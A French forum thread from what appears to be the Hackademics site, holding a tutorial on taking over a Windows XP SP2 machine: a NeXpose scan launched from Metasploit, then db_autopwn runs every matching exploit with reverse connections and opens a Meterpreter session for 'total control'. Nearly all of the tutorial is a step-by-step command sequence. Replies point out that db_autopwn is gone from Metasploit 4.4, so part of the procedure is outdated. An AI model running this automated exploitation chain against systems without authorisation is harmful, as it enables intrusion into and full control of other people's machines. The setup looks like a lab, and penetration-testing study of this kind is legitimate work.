Annonce

Réduire
Aucune annonce.

Intrusion système avec NeXpose & Metasploit

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Tutoriel Intrusion système avec NeXpose & Metasploit

    [b]Intrusion système avec NeXpose & Metasploit


    Le PC-Attaquant 192.168.118.118 Ubuntu
    La PC-Cible 10.0.0.10 Windows XP SP2




    Pré-requis: Tout d'abord vous devez télécharger et installer le framework Metasploit (Version antérieure avec autopwn: https://bitbucket.org/jrossi/metasploit) et le scanner NeXpose.

    Veillez à ce que Metasploit soit à jour:
    Code:
    msfupdate









    I-Démarage du server NeXpose

    Nous allons démarrer le server depuis son répertoire d'installation par défaut.

    Ouvrez un terminal et lancez les commandes suivantes:
    Code:
     cd /opt/rapid7/nexpose/nsc
    Code:
    ./nsc.sh









    I-a (optionnel) Sniffing du réseau

    Nous allons sniffer le réseau pour savoir si le scan se déroule bien et, dans l'éventualité d'un problème nous aurions une trace de la source de celui-ci.

    Dans un nouveau terminal:

    Code:
    sudo tcpdump –i eth0 –nn host 192.168.118.118 and host 10.0.0.10
    192.168.118.118: à remplacer par l'adresse IP du PC-Attaquant.
    10.0.0.10: à remplacer par l'adresse IP du PC-Cible.










    II-Création de la base de donnée

    Dans un nouveau terminal nous démarons la console Metasploit:
    Code:
    msfconsole

    Nous créons la base de données:
    Code:
    db_create
    Si la base de données est déjà créée il suffit de s'y connecter:
    Code:
    db_connect









    III-Lancement du plugin NeXpose

    Dans la console Metasploit:
    Code:
    load nexpose









    IV-Connexion au serveur NeXpose

    Maintenant nous allons nous connecter au serveur NeXpose:

    Code:
    nexpose_connect <admin>:<passwd>@<NeXpose_hostname>
    <admin>: à remplacer par l'identifiant renseigné lors de l'installation de NeXpose.
    <passwd>: à remplacer par le password renseigné lors de l'installation de NeXpose.
    <NeXpose_hostname>: à remplacer par l'adresse de votre server.


    Dans mon cas:
    Code:
    nexpose_connect _47:[email protected]









    V-Pentest du PC-Cible

    Maintenant que nous sommes connectés au serveur NeXpose nous pouvons lancer le scan sur le PC-Cible:
    Code:
    nexpose_scan –v 10.0.0.10
    10.0.0.10: à remplacer par l'adresse IP du PC-Cible.










    VI- Exploitations des vulnérabilités découvertes

    Maintenant que le scan est complété, le module "db_autopwn" peut-être invoqué afin d’exploiter les vulnérabilités découvertes sur le PC-Cible.
    Nous allons utiliser les options suivantes:
    Code:
    -t (afficher tous les modules d’exploits ayant une correspondance avec le résultat du scan), 
    –x (sélectionner les modules d’exploits basés sur les références des vulnérabilités), 
    –e (lancer les exploits sur toutes les cibles vulnérables à un exploit donné), 
    –r (utiliser une connexion « reversée », comme "reverse_tcp")

    Nous exécutons:
    Code:
    db_autopwn –t –x –e -r









    VII-Connexion à la session Meterpreter

    Désormais la cible est compromise par un des exploits, une session meterpreter s’est établie automatiquement entre le PC-Cible et le PC-Attaquant.
    Il suffit de sélectionner la session et d’interagir avec cette dernière à l’aide de la commande:
    Code:
    session –i 1
    1: à remplacer par le numéro de session de votre choix.

    L’option –i signifie « interagir » et le « 1 » signifie le numéro de sessions choisi.










    VIII-Exercice de votre contrôle sur le PC-Cible



    Désormais vous avez un contrôle total sur le PC-Cible.

    Vous pouvez voir l'étentue des possibilités de Meterpreter avec la commande:
    Code:
    help







    source:cusin
    Fichiers attachés
    Dernière modification par comaX, 29 juillet 2012, 11h02.


    Suivre Hackademics: Twitter, Google+, Facebook.

  • #2
    Un truc me chiffonne dans ton tuto, c'est que tu installe metaploit et que tu met à jour metasploit, mais que db_autopwn n'est plus présent dans la version 4.4 de metasploit.
    est-tu sur que ton tuto est encore à jour ???

    voir ici

    https://community.rapid7.com/message/2159#2159
    Dernière modification par Iddl3, 28 juillet 2012, 07h16.
    WITHOUT DEVIATION FROM THE NORM, PROGRESS IS NOT POSSIBLE
    -Frank Zappa

    Commentaire


    • #3
      En effet tu as raison, db_autopwn n'est plus présent dans l'actuel metasploit...

      Ayant fait ce tuto il y a quelques temps sur une version antérieure de metasploit je n'avais pas du tout envisagé ça.

      Je vais rajouter en pièce jointe une version de metasploit contenant encore ce plugin ainsi que db_autopwn.rb et file_autopwn.rb


      J'espère que sa fonctionnera... (même si j'en doute).



      En tout cas merci pour ta remarque Iddl3 !


      Suivre Hackademics: Twitter, Google+, Facebook.

      Commentaire

      Chargement...
      X